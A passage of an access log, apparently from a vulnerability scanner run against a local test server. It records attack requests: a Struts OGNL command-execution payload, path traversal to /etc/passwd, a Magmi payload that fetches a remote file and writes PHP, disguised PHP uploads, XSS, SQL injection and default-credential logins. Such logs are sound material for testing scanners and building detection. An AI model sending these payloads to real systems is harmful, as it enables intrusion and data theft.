AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /loginLess/../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"{\x22Password\x22:\x2229KD22WpsRqc4E7o8soFmqAh8AA\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"PATCH", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x2229KD1sSLE6NzNuhJKiPBKocsrBw.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"{\x22UserName\x22:\x22Administrator\x22,\x22Password\x22:\x2229KD22WpsRqc4E7o8soFmqAh8AA\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /redfish/v1/SessionService/Sessions/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 